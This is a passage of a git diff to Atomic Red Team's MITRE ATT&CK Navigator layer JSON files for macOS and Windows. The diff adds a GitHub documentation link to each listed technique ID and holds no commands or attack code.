cs/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-tea
m/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
index 23c8d246..09dc27c0 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqu
eID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"
T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"ena
bled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment
":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled"
:true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"ht
tps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/maste
r/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T
1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/mas
ter/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-
red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcan
aryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index 9934245a..0d988691 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqu
eID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"